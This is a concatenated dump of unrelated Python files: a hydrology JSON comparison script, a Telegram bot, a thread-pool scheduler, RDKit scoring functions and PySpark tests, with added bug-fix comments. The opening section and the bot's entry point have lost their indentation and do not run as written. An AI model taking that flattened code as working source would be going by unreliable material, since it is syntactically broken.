    ``['Total', '<name>', 'runs:', '<count>']``.  Lines with fewer than four
    tokens are skipped — the original indexed token 1 unconditionally, which
    raised IndexError on any one-word line.  If no line matches, the file is
    left untouched.
    """
    with open(input_txt, 'r') as myfile:
        datas = myfile.read()
    repline = None
    newline = None
    for line in datas.split('\n'):
        tokens = line.split()
        if len(tokens) >= 4 and tokens[1] == param_string:
            # bump the count (4th token) by one
            tokens[3] = str(int(tokens[3]) + 1)
            newline = ' '.join(tokens)
            repline = line
            break
    # Write the file out again only if a counter line was found.
    if repline is not None and newline is not None:
        with open(input_txt, 'w') as myfile:
            myfile.write(datas.replace(repline, newline))
def compare (inputObj, path, ID, workingDir,
HUCID, xy, rcode, servName): #Compare json txt files
# TODO: improve notifications of differences, maybe add new property for "oldValue"
try:
refObj = None
refFile = os.path.join(path, ID+".json") #Get the reference json file from existing root folder
if isinstance(inputObj[0], dict) and path.find('Char')>0: #Condition: If the inner object of the list is dictionary
inputPars = inputObj[0]['parameters']
i = 0
dictlist = [[] for _ in range (len(inputPars))] #Initialize list of lists
while i < len(inputPars):
dic = (inputPars[i]) #Extract dictionary object i
for key in sorted(dic): #Sort it by keys and extract each key, next, append to the dictionary
dictlist[i].append({key:str(dic[key])})
i += 1
inputObj = dictlist #Return sorted list of lists instead of list of dictionaries for basin characteristics
if os.path.isfile(refFile):
with open (refFile) as f:
refObj = json.load(f)
if inputObj!= refObj:
dif = []
dif.append ([j for j in inputObj if not j in refObj])
if (path.find('Char')>0):
fSummary = open(sumPath, 'a')
fSummary.write (str(ID)+ ':' + ' BChar not Equal'+ '\n')
fSummary.write (str(ID)+ ':' + str(HUCID) + ' HUCID'+ '\n')
fSummary.write (str(ID)+ ':' + str(xy) +' xy coordinates'+ '\n')
fSummary.write (str(ID)+ ':' + str(rcode) +' State'+ '\n')
fSummary.write (str(ID)+ ':' + str(servName) +' Server '+ '\n')
fSummary.write (str(ID)+ ':' + str(dif) +' Difference between NewCall and Ref'+ '\n')
counterOverwrite (sumPath, 'bcharNoteq')
X1 = refObj
X2 = inputObj
#merge two dictionaries and add missing values if any
dictOutput = []
for i in range (0, len(X1)):
finalMap1 = {}
for d in X1[i]:
finalMap1.update(d)
finalMap2 = {}
for d in X2[i]:
finalMap2.update(d)
union = dict(finalMap1.items() | finalMap2.items()) #get the union of dictionaries
dictlist = []
for key in sorted(union): #Sort it by keys and extract each key, next append to the dictionary
dictlist.append({key:str(union[key])})
dictOutput.append(dictlist)
if (dictOutput != refObj): #if output dictionary is not equal to the reference one, replace it
WiMLogging().sm ('Updated Bchar in the reference folder : ', str(ID) )
refObj = dictOutput
fSummary.write (str(ID)+ ':' +'Bchar gets replaced'+ '\n')
fSummary.write (str(ID)+ ':' + 'Bchar in reference' + '\n')
fSummary.write (refObj)
fSummary.write (str(ID)+ ':' + 'Bchar from server call' + '\n')
fSummary.write (dictOutput)
counterOverwrite (sumPath, 'bcharrep')
counterOverwrite (sumPath, 'bchar')
fSummary.close ()
elif (path.find('Del')>0):
fSummary = open(sumPath, 'a')
fSummary.write (str(ID)+ ':' + ' BDel not Equal'+ '\n')
fSummary.write (str(ID)+ ':' + str(HUCID) + ' HUCID'+ '\n')
fSummary.write (str(ID)+ ':' + str(xy) +' xy coordinates'+ '\n')
fSummary.write (str(ID)+ ':' + str(rcode) +' State'+ '\n')
fSummary.write (str(ID)+ ':' + str(servName) +' Server '+ '\n')
fSummary.write (str(ID)+ ':' + str(dif) +' Difference between Newcall and Ref'+ '\n')
counterOverwrite (sumPath, 'bdelNoteq')
counterOverwrite (sumPath, 'bdel')
fSummary.close ()
else:
fSummary = open(sumPath, 'a')
fSummary.write (str(ID)+ ':' + ' FlowStats not Equal'+ '\n')
fSummary.write (str(ID)+ ':' + str(HUCID) + ' HUCID'+ '\n')
fSummary.write (str(ID)+ ':' + str(xy) +' xy coordinates'+ '\n')
fSummary.write (str(ID)+ ':' + str(rcode) +' State'+ '\n')
fSummary.write (str(ID)+ ':' + str(servName) +' Server '+ '\n')
fSummary.write (str(ID)+ ':' + str(dif) +' Difference between NewCall and Ref'+ '\n')
counterOverwrite (sumPath, 'flowstatsNoteq')
X1 = refObj
X2 = inputObj
#merge two dictionaries and add missing values if any
dictOutput = []
for i in range (0, len(X1)):
finalMap1 = {}
for d in X1[i]:
finalMap1.update(d)
finalMap2 = {}
for d in X2[i]:
finalMap2.update(d)
union = dict(finalMap1.items() | finalMap2.items()) #get the union of dictionaries
dictlist = []
for key in sorted(union): #Sort it by keys and extract each key, next append to the dictionary
dictlist.append({key:str(union[key])})
dictOutput.append(dictlist)
if (dictOutput != refObj): #if output dictionary is not equal to the reference one, replace it
WiMLogging().sm ('Updated FlowStats in the reference folder : ', str(ID) )
refObj = dictOutput
fSummary.write (str(ID)+ ':' + 'FlowStats gets replaced'+ '\n')
fSummary.write (str(ID)+ ':' + 'FlowStats in reference' + '\n')
fSummary.write (refObj)
fSummary.write (str(ID)+ ':' + 'FlowStats from server call' + '\n')
fSummary.write (dictOutput)
counterOverwrite (sumPath, 'flowstatsrep')
counterOverwrite (sumPath, 'flowstats')
fSummary.close ()
WiMLogging().sm("Not equal Json's"+" "+ID)
writeToJSONFile(workingDir,ID+"_"+str(path.rsplit('/', 1)[-1]),inputObj) #Store in log folder
else:
if (path.find('Char')>0):
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + 'BChar Equal Jsons' + '\n')
counterOverwrite (sumPath, 'bchar')
fSummary.close ()
elif (path.find('Del')>0):
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + 'BDel Equal Jsons' + '\n')
counterOverwrite (sumPath, 'bdel')
fSummary.close ()
else:
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + 'FlowStats Equal Jsons' + '\n')
counterOverwrite (sumPath, 'flowstats')
fSummary.close ()
tb = traceback.format_exc()
WiMLogging().sm("Equal Json's"+" "+ID+" "+ tb) #Don't create file
else:
if (path.find('Char')>0):#file not in reference folder, Create it
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + 'BChar New'+ '\n')
counterOverwrite (sumPath, 'bcharNew')
counterOverwrite (sumPath, 'bchar')
fSummary.close ()
elif (path.find('Del')>0):
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + ' BDel New'+ '\n')
counterOverwrite (sumPath, 'bdelNew')
counterOverwrite (sumPath, 'bdel')
fSummary.close()
else:
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + ' FlowStats New'+ '\n')
counterOverwrite (sumPath, 'flowstatsNew')
counterOverwrite (sumPath, 'flowstats')
fSummary.close()
WiMLogging().sm("File not in reference folder"+" "+refFile)
writeToJSONFile(path, ID,inputObj)
except:
counterOverwrite (sumPath, 'bcharfail')
counterOverwrite (sumPath, 'bdelfail')
counterOverwrite (sumPath, 'flowstatsfail')
tb=traceback.format_exc()
WiMLogging().sm("Error Comparing "+tb)
writeToJSONFile(workingDir, ID+"_viaError",{'error':tb})
#Main thread
# Spawns maxThreads daemon workers, each running run(i, queue_list); daemons
# exit automatically when the main thread ends.
# NOTE(review): indentation was lost in this dump; nesting is inferred -- confirm
# against the original file.
for i in range(maxThreads): #Run threads as daemon, so they close when finish
worker = Thread(target=run, args=(i, queue_list,))
worker.setDaemon(True)
time.sleep(0.1)
worker.start()
#Global var counting number of active threads
threadsINI = threading.active_count()
f = 0
# Feed one work item per input row; after simulThreads submissions, spin until
# a worker thread finishes (detected via threading.active_count()) before
# submitting more.
for row in file: #Query to invoke threads !
queue_list.put((row[rcode], row[x], row[y],
refDir, row[uniqueID], workingDir))
WiMLogging().sm ('***Calling Input: '+ row[uniqueID])
if f == simulThreads:
while f == simulThreads and threading.active_count() == threadsINI: #Listener
pass #Infinite loop waiting for a thread to be done with its work
time.sleep (0.5) #There is a chance to run into an error if two threads finished simultaneously within a 0.1s or higher interval
if threading.active_count()<threadsINI:
print ('Initialized') #Each Initialized statement should follow a Finished one
f = simulThreads - (threadsINI-threading.active_count ())+1
threadsINI = threading.active_count ()
else:
f=f+1
queue_list.join() #Close main thread after child threads are done working
print ('*** Done')
|
main.py | from telegram.ext import Updater,CommandHandler, Filters
from promise import Promise
import story, errors, os, logging, hints
import time, threading, pickle, users
import sys
from threading import Thread
with open("api/TOKEN") as token_file:
token = token_file.read().strip()
with open("api/OWNERS") as owner_file:
owners = owner_file.readlines()
def send_source(bot, update):
    """Reply to the /source command with the bot's public repository URL."""
    repo_url = "https://github.com/theFox6/HPIMysterybot"
    update.message.reply_text(repo_url)
def main():
    """Wire up the Telegram bot: persistence, restart support, and handlers.

    Blocks in updater.idle() until the process is stopped.
    """
    updater = Updater(token=token)
    dispatcher = updater.dispatcher

    def loadData():
        # Restore pickled conversation/user/highscore state from backup/.
        try:
            # BUG FIX: files were opened/closed manually with no finally;
            # `with` guarantees they close even if unpickling raises.
            with open('backup/conversations', 'rb') as f:
                story.conv_handler.conversations = pickle.load(f)
            with open('backup/userdata', 'rb') as f:
                users.users = pickle.load(f)
            with open('backup/scores', 'rb') as f:
                users.highscores = pickle.load(f)['scores']
        except FileNotFoundError:
            logging.error("Data file not found")
        except Exception:  # BUG FIX: was a bare `except:` (caught SystemExit too)
            logging.error(sys.exc_info()[0])

    def saveData():
        # Resolve any pending async conversation states before pickling.
        resolved = dict()
        for k, v in story.conv_handler.conversations.items():
            # BUG FIX: was `len(v) is 2` -- identity comparison on an int;
            # works only by CPython small-int caching and is a SyntaxWarning
            # on modern Python. Use equality.
            if isinstance(v, tuple) and len(v) == 2 and isinstance(v[1], Promise):
                try:
                    new_state = v[1].result()  # result of the async function
                except Exception:
                    new_state = v[0]  # async handler raised: keep the old state
                resolved[k] = new_state
            else:
                resolved[k] = v
        try:
            with open('backup/conversations', 'wb+') as f:
                pickle.dump(resolved, f)
            with open('backup/userdata', 'wb+') as f:
                # NOTE(review): loadData() reads into users.users but this dumps
                # users.all -- confirm both names refer to the same store.
                pickle.dump(users.all, f)
            with open('backup/scores', 'wb+') as f:
                pickle.dump({'scores': users.highscores}, f)
        except Exception:  # BUG FIX: was a bare `except:`
            logging.error(sys.exc_info()[0])

    loadData()

    def stop_and_restart():
        """Gracefully stop the Updater and replace the current process with a new one"""
        saveData()
        updater.stop()
        logging.debug("stopped updater")
        #py_exec = '"' + sys.executable + '"'
        #os.execl(py_exec, py_exec, *sys.argv)
        os.system("python main.py")

    def restart(bot, update):
        print('Bot is restarting...')
        update.message.reply_text('Bot is restarting...')
        print(update.message.from_user.name + " requested a restart")
        # Restart on a thread so this handler can return before the stop.
        Thread(target=stop_and_restart).start()

    if len(owners) == 0:
        print("no owners file: disabling restart command")
    else:
        dispatcher.add_handler(CommandHandler('restart', restart, filters=Filters.user(username=owners)))
    dispatcher.add_handler(CommandHandler('source', send_source))
    dispatcher.add_handler(story.conv_handler)
    dispatcher.add_handler(hints.callback_handler)
    dispatcher.add_error_handler(errors.error_callback)
    updater.start_polling()
    print("bot ready")
    updater.idle()
# Script entry point: start the bot only when executed directly, not on import.
if __name__ == '__main__':
main()
|
scheduler.py | import threading
from PyQt5 import QtCore
class ThreadPool():
    """A fixed-size pool of named threading.Thread workers, looked up by name."""

    def __init__(self):
        self.max_num_threads = 8      # hard cap on on-demand thread creation
        self.current_num_threads = 0  # how many threads were created on demand
        self.threads = []
        # Pre-populate with placeholder (never-started, default-named) threads.
        for thread_index in range(self.max_num_threads):
            self.threads.append(threading.Thread())

    # find an available thread from the pool
    def get_thread(self, str_name):
        # BUG FIX: called the bare name thread_is_active (NameError at runtime);
        # it is a method and must be reached through self.
        if self.thread_is_active(str_name):
            self.wait_for_thread(str_name)

    def thread_is_active(self, str_name):
        """Return True if a pooled thread with this name exists and is running."""
        found_thread = self.find_thread(str_name)
        if found_thread is not None:
            # thread is alive if can't join so it is active if it isn't alive
            # not too sure about this might just wanna subclass thread
            return found_thread.is_alive()
        return False

    def find_thread(self, str_name):
        """Return the pooled thread with the given name, or None if absent."""
        for thread in self.threads:
            if thread.name == str_name:
                return thread
        return None

    def start_thread(self, str_thread_name):
        """Start the named pooled thread; if it is already running, wait first."""
        for thread in self.threads:
            if thread.name == str_thread_name:
                if not thread.is_alive():
                    thread.start()
                else:
                    # Already running: wait until it finishes, then start again.
                    thread = self.wait_for_thread(str_thread_name)
                    thread.start()
                break

    def wait_for_thread(self, str_name):
        """Block until the named thread finishes; return it (None if unknown)."""
        # BUG FIX: the original called the bare name find_thread (NameError) and
        # then used Thread.start_thread (no such method) on a busy-wait helper
        # whose target took a required argument it was never given. Join the
        # target thread directly instead.
        current_thread = self.find_thread(str_name)
        if current_thread is not None and current_thread.is_alive():
            current_thread.join()
        return current_thread

    def busy_wait(self, desired_thread):
        # Legacy spin-wait helper, retained for API compatibility.
        while desired_thread.is_alive():
            pass

    # todo: doesnt respect size of max_num_threads
    def find_or_create_thread(self, str_name, _func, *kwargs):
        """Return the thread named str_name, creating one around _func if absent."""
        # BUG FIX: the original took the else branch on the FIRST pooled thread
        # whose name didn't match and created a duplicate; scan the whole pool
        # before deciding to create.
        for thread in self.threads:
            if thread.name == str_name:
                print("found thread " + str_name)
                self.wait_for_thread(str_name)
                return thread
        if self.current_num_threads < self.max_num_threads:
            if len(kwargs) != 0:
                print("not here")
                new_thread = threading.Thread(target=_func, args=kwargs)
            else:
                print("here")
                new_thread = threading.Thread(target=_func)
            new_thread.name = str_name
            self.threads.append(new_thread)
            self.current_num_threads += 1  # BUG FIX: counter was never incremented
            return new_thread
        raise Exception("too many threads, this will need revisited")

    def profile(self):
        """Return a human-readable listing of pooled threads and their state."""
        str_return_msg = ""
        for thread in self.threads:
            # BUG FIX: thread_is_active expects a *name*; passing the Thread
            # object made every thread report as dead.
            if self.thread_is_active(thread.name):
                str_return_msg += "Active Thread: " + thread.name + "\n"
            else:
                str_return_msg += "Dead Thread: " + thread.name + "\n"
        return str_return_msg
class ProgressReporter():
    """Tracks fractional progress for a named event."""

    def __init__(self, event_name_str):
        self.name = event_name_str
        # BUG FIX: the original assigned a *local* variable (`progress = 0.0`),
        # so instances had no .progress attribute until set_progress() ran.
        self.progress = 0.0

    def set_progress(self, percent):
        """Record the current progress value."""
        self.progress = percent
        # emit progress_changed
class Event():
    """Bundles a named unit of work with its thread, callable, args, and progress."""

    def __init__(self, str_name, _thread, _func, *kwargs):
        self.name = str_name
        self.thread = _thread
        self.func = _func
        self.args = kwargs
        self.progress = ProgressReporter(self.name)

    def pre_start(self):
        """Validate the event just before launch; raise if it cannot run."""
        print("Starting event " + self.name)
        if self.thread is None:
            print(self.print())
            raise Exception("Event has no thread")
        if self.func is None:
            print(self.print())
            raise Exception("Event has no function attached")

    def print(self):
        """Return a one-line textual description of the event."""
        return "Event Name " + self.name + "\n"
# The scheduler is the interface into the event system
# A scheduled event is an event that will run on its own
# thread and tell the scheduler when it finishes
# also will have support for recurring timed events
class Scheduler():
    def __init__(self):
        self.event_queue = []  # a history for now; will eventually be a real queue
        self.thread_pool = ThreadPool()
        self.scheduler_lock = threading.Lock()
        self.run = True
        # The scheduler loop itself runs on a pooled thread.
        self.scheduler_thread = self.thread_pool.find_or_create_thread("Scheduler", self._run_scheduler)
        self.thread_pool.start_thread("Scheduler")

    def create_event(self, str_event_name, _func, *kwargs):
        """Queue a named event; its worker thread is found/created immediately."""
        print("adding event " + str_event_name)
        self.scheduler_lock.acquire()
        worker_thread = self.thread_pool.find_or_create_thread(str_event_name, _func, kwargs)
        self.event_queue.append(Event(str_event_name, worker_thread, _func, kwargs))
        self.scheduler_lock.release()

    def profile(self):
        # no lock yolo, prob needs fixed
        print(self.thread_pool.profile())
        print("------- List of Events in our queue (history for now) reverse order")
        for event in self.event_queue:
            print("Event: " + event.print())

    def _run_scheduler(self):
        """Scheduler loop: validate and launch each queued event, then drain."""
        print("event loop outer")
        while self.run:
            self.scheduler_lock.acquire()
            for event in self.event_queue:
                print("event loop")
                # run checks and stuff
                event.pre_start()
                # kick off the thread (also handle waiting if we have to)
                self.thread_pool.start_thread(event.name)
            self.event_queue.clear()
            self.scheduler_lock.release()

    def join(self, str_event_name):
        """Block until the named event's thread has finished, if it exists."""
        worker = self.thread_pool.find_thread(str_event_name)
        if worker is not None:
            worker.join()

    def kill(self):
        # Signal the scheduler loop to exit after its current pass.
        self.run = False
scoring_functions.py | #!/usr/bin/env python
from __future__ import print_function, division
import numpy as np
from rdkit import Chem
from rdkit import rdBase
from rdkit.Chem import AllChem
from rdkit import DataStructs
from sklearn import svm
import time
import pickle
import re
import threading
import pexpect
rdBase.DisableLog('rdApp.error')
"""Scoring function should be a class where some tasks that are shared for every call
can be reallocated to the __init__, and has a __call__ method which takes a single SMILES of
argument and returns a float. A multiprocessing class will then spawn workers and divide the
list of SMILES given between them.
Passing *args and **kwargs through a subprocess call is slightly tricky because we need to know
their types - everything will be a string once we have passed it. Therefor, we instead use class
attributes which we can modify in place before any subprocess is created. Any **kwarg left over in
the call to get_scoring_function will be checked against a list of (allowed) kwargs for the class
and if a match is found the value of the item will be the new value for the class.
If num_processes == 0, the scoring function will be run in the main process. Depending on how
demanding the scoring function is and how well the OS handles the multiprocessing, this might
be faster than multiprocessing in some cases."""
class no_sulphur():
    """Scores structures based on not containing sulphur."""
    kwargs = []

    def __init__(self):
        pass

    def __call__(self, smile):
        mol = Chem.MolFromSmiles(smile)
        if not mol:
            # Invalid SMILES scores zero.
            return 0.0
        # Atomic number 16 == sulphur; reward molecules that lack it.
        contains_sulphur = any(atom.GetAtomicNum() == 16 for atom in mol.GetAtoms())
        return float(not contains_sulphur)
class tanimoto():
    """Scores structures based on Tanimoto similarity to a query structure.
    Scores are only scaled up to k=(0,1), after which no more reward is given."""
    kwargs = ["k", "query_structure"]
    k = 0.7
    query_structure = "Cc1ccc(cc1)c2cc(nn2c3ccc(cc3)S(=O)(=O)N)C(F)(F)F"

    def __init__(self):
        # Precompute the query fingerprint once; it is reused for every call.
        query_mol = Chem.MolFromSmiles(self.query_structure)
        self.query_fp = AllChem.GetMorganFingerprint(query_mol, 2, useCounts=True, useFeatures=True)

    def __call__(self, smile):
        mol = Chem.MolFromSmiles(smile)
        if not mol:
            # Invalid SMILES scores zero.
            return 0.0
        fp = AllChem.GetMorganFingerprint(mol, 2, useCounts=True, useFeatures=True)
        similarity = DataStructs.TanimotoSimilarity(self.query_fp, fp)
        # Cap the reward at k, then rescale so the score lies in [0, 1].
        return float(min(similarity, self.k) / self.k)
class activity_model():
    """Scores based on an ECFP classifier for activity."""
    kwargs = ["clf_path"]
    clf_path = 'data/clf.pkl'

    def __init__(self):
        # Load the pickled sklearn classifier once up front.
        with open(self.clf_path, "rb") as f:
            self.clf = pickle.load(f)

    def __call__(self, smile):
        mol = Chem.MolFromSmiles(smile)
        if not mol:
            # Invalid SMILES scores zero.
            return 0.0
        fp = activity_model.fingerprints_from_mol(mol)
        # Probability of the "active" class (column 1 of predict_proba).
        return float(self.clf.predict_proba(fp)[:, 1])

    @classmethod
    def fingerprints_from_mol(cls, mol):
        """Fold a count-based Morgan fingerprint into a fixed 2048-wide array."""
        fp = AllChem.GetMorganFingerprint(mol, 3, useCounts=True, useFeatures=True)
        size = 2048
        folded = np.zeros((1, size), np.int32)
        for idx, count in fp.GetNonzeroElements().items():
            folded[0, idx % size] += int(count)
        return folded
class Worker():
    """A worker class for the Multiprocessing functionality. Spawns a subprocess
    that is listening for input SMILES and inserts the score into the given
    index in the given list."""

    def __init__(self, scoring_function=None):
        """The score_re is a regular expression that extracts the score from the
        stdout of the subprocess. This means only scoring functions with range
        0.0-1.0 will work, for other ranges this re has to be modified."""
        self.proc = pexpect.spawn('./multiprocess.py ' + scoring_function,
                                  encoding='utf-8')
        print(self.is_alive())

    def __call__(self, smile, index, result_list):
        """Score one SMILES via the subprocess and store it at result_list[index]."""
        self.proc.sendline(smile)
        output = self.proc.expect([re.escape(smile) + r" 1\.0+|[0]\.[0-9]+", 'None', pexpect.TIMEOUT])
        # BUG FIX: was `output is 0` -- identity comparison on an int, which is
        # a SyntaxWarning on modern Python; use equality.
        if output == 0:
            matched = self.proc.after
            # BUG FIX: the original used matched.lstrip(smile + " "), but
            # str.lstrip strips a *character set*, so any score whose leading
            # digits also appear in the SMILES was mangled. Drop the echoed
            # "<smile> " prefix by length instead.
            if matched.startswith(smile):
                matched = matched[len(smile):]
            score = float(matched.strip())
        elif output in [1, 2]:
            # 'None' reply (unparsable SMILES) or timeout: score zero.
            score = 0.0
        result_list[index] = score

    def is_alive(self):
        return self.proc.isalive()
class Multiprocessing():
    """Class for handling multiprocessing of scoring functions. OEtoolkits cant be used with
    native multiprocessing (cant be pickled), so instead we spawn threads that create
    subprocesses."""

    def __init__(self, num_processes=None, scoring_function=None):
        self.n = num_processes
        self.workers = [Worker(scoring_function=scoring_function) for _ in range(num_processes)]

    def alive_workers(self):
        """Indices of workers whose subprocess is still running."""
        return [i for i, worker in enumerate(self.workers) if worker.is_alive()]

    def __call__(self, smiles):
        scores = [0 for _ in range(len(smiles))]
        pending = [smile for smile in smiles]
        while pending:
            alive = self.alive_workers()
            if not alive:
                raise RuntimeError("All subprocesses are dead, exiting.")
            # Worker threads are named with the worker's index, so the set of
            # integer-named live threads tells us which workers are busy. The
            # main thread's name can't be parsed as an int and is skipped.
            busy = []
            for t in threading.enumerate():
                try:
                    busy.append(int(t.name))
                except ValueError:
                    continue
            for worker_idx in [i for i in alive if i not in busy]:
                if pending:
                    # Hand the worker one SMILES plus the slot its score goes in.
                    smile = pending.pop()
                    slot = len(pending)
                    threading.Thread(target=self.workers[worker_idx],
                                     name=str(worker_idx),
                                     args=(smile, slot, scores)).start()
            time.sleep(0.01)
        # Wait for every still-running worker thread before returning.
        for t in threading.enumerate():
            try:
                int(t.name)
                t.join()
            except ValueError:
                continue
        return np.array(scores, dtype=np.float32)
class Singleprocessing():
    """Adds an option to not spawn new processes for the scoring functions, but rather
    run them in the main process."""

    def __init__(self, scoring_function=None):
        # Instantiate once; the same instance scores every batch.
        self.scoring_function = scoring_function()

    def __call__(self, smiles):
        # Score sequentially in the current process.
        return np.array(list(map(self.scoring_function, smiles)), dtype=np.float32)
def get_scoring_function(scoring_function, num_processes=None, **kwargs):
    """Function that initializes and returns a scoring function by name.

    Recognized kwargs are written onto the scoring class before instantiation;
    num_processes == 0 runs in-process, otherwise a worker pool is spawned.
    """
    scoring_function_classes = [no_sulphur, tanimoto, activity_model]
    scoring_functions = [f.__name__ for f in scoring_function_classes]
    # BUG FIX: validate the name BEFORE selecting; the original indexed [0]
    # first, so an unknown name raised IndexError instead of this ValueError.
    if scoring_function not in scoring_functions:
        raise ValueError("Scoring function must be one of {}".format([f for f in scoring_functions]))
    scoring_function_class = [f for f in scoring_function_classes if f.__name__ == scoring_function][0]
    # Override class attributes with any recognized keyword arguments.
    for k, v in kwargs.items():
        if k in scoring_function_class.kwargs:
            setattr(scoring_function_class, k, v)
    if num_processes == 0:
        return Singleprocessing(scoring_function=scoring_function_class)
    return Multiprocessing(scoring_function=scoring_function, num_processes=num_processes)
|
tests.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
    """Spill/merge behaviour of ExternalMerger under various memory limits."""

    def setUp(self):
        self.N = 1 << 12
        self.l = [i for i in xrange(self.N)]
        self.data = list(zip(self.l, self.l))
        # list-based combiner set: create, append value, extend combiner
        self.agg = Aggregator(lambda x: [x],
                              lambda x, y: x.append(y) or x,
                              lambda x, y: x.extend(y) or x)

    def test_small_dataset(self):
        merger = ExternalMerger(self.agg, 1000)
        merger.mergeValues(self.data)
        self.assertEqual(merger.spills, 0)  # fits in memory: no spill
        self.assertEqual(sum(sum(v) for k, v in merger.items()),
                         sum(xrange(self.N)))
        merger = ExternalMerger(self.agg, 1000)
        merger.mergeCombiners(map(lambda kv: (kv[0], [kv[1]]), self.data))
        self.assertEqual(merger.spills, 0)
        self.assertEqual(sum(sum(v) for k, v in merger.items()),
                         sum(xrange(self.N)))

    def test_medium_dataset(self):
        merger = ExternalMerger(self.agg, 20)
        merger.mergeValues(self.data)
        self.assertTrue(merger.spills >= 1)  # tight limit forces spilling
        self.assertEqual(sum(sum(v) for k, v in merger.items()),
                         sum(xrange(self.N)))
        merger = ExternalMerger(self.agg, 10)
        merger.mergeCombiners(map(lambda kv: (kv[0], [kv[1]]), self.data * 3))
        self.assertTrue(merger.spills >= 1)
        self.assertEqual(sum(sum(v) for k, v in merger.items()),
                         sum(xrange(self.N)) * 3)

    def test_huge_dataset(self):
        merger = ExternalMerger(self.agg, 5, partitions=3)
        merger.mergeCombiners(map(lambda kv: (kv[0], [str(kv[1])]), self.data * 10))
        self.assertTrue(merger.spills >= 1)
        self.assertEqual(sum(len(v) for k, v in merger.items()),
                         self.N * 10)
        merger._cleanup()

    def test_group_by_key(self):

        def gen_data(N, step):
            for i in range(1, N + 1, step):
                for j in range(i):
                    yield (i, [j])

        def gen_gs(N, step=1):
            return shuffle.GroupByKey(gen_data(N, step))

        self.assertEqual(1, len(list(gen_gs(1))))
        self.assertEqual(2, len(list(gen_gs(2))))
        self.assertEqual(100, len(list(gen_gs(100))))
        self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
        self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
        for k, vs in gen_gs(50002, 10000):
            self.assertEqual(k, len(vs))
            self.assertEqual(list(range(k)), list(vs))
        # Grouped results must survive a pickle round trip.
        pickler = PickleSerializer()
        groups = pickler.loads(pickler.dumps(list(gen_gs(50002, 30000))))
        for k, vs in groups:
            self.assertEqual(k, len(vs))
            self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
    """In-memory and spilling behaviour of ExternalSorter."""

    def test_in_memory_sort(self):
        values = list(range(1024))
        random.shuffle(values)
        sorter = ExternalSorter(1024)
        self.assertEqual(sorted(values), list(sorter.sorted(values)))
        self.assertEqual(sorted(values, reverse=True),
                         list(sorter.sorted(values, reverse=True)))
        self.assertEqual(sorted(values, key=lambda x: -x),
                         list(sorter.sorted(values, key=lambda x: -x)))
        self.assertEqual(sorted(values, key=lambda x: -x, reverse=True),
                         list(sorter.sorted(values, key=lambda x: -x, reverse=True)))

    def test_external_sort(self):

        class CustomizedSorter(ExternalSorter):
            # Never raise the memory limit, so every batch spills to disk.
            def _next_limit(self):
                return self.memory_limit

        values = list(range(1024))
        random.shuffle(values)
        sorter = CustomizedSorter(1)
        self.assertEqual(sorted(values), list(sorter.sorted(values)))
        self.assertGreater(shuffle.DiskBytesSpilled, 0)
        spilled = shuffle.DiskBytesSpilled
        self.assertEqual(sorted(values, reverse=True),
                         list(sorter.sorted(values, reverse=True)))
        self.assertGreater(shuffle.DiskBytesSpilled, spilled)
        spilled = shuffle.DiskBytesSpilled
        self.assertEqual(sorted(values, key=lambda x: -x),
                         list(sorter.sorted(values, key=lambda x: -x)))
        self.assertGreater(shuffle.DiskBytesSpilled, spilled)
        spilled = shuffle.DiskBytesSpilled
        self.assertEqual(sorted(values, key=lambda x: -x, reverse=True),
                         list(sorter.sorted(values, key=lambda x: -x, reverse=True)))
        self.assertGreater(shuffle.DiskBytesSpilled, spilled)

    def test_external_sort_in_rdd(self):
        conf = SparkConf().set("spark.python.worker.memory", "1m")
        sc = SparkContext(conf=conf)
        values = list(range(10240))
        random.shuffle(values)
        rdd = sc.parallelize(values, 4)
        self.assertEqual(sorted(values), rdd.sortBy(lambda x: x).collect())
        sc.stop()
class SerializationTestCase(unittest.TestCase):
    """Round-trip tests for the pickle- and cloudpickle-based serializers."""

    def test_namedtuple(self):
        from collections import namedtuple
        from pickle import dumps, loads
        P = namedtuple("P", "x y")
        p1 = P(1, 3)
        self.assertEqual(p1, loads(dumps(p1, 2)))
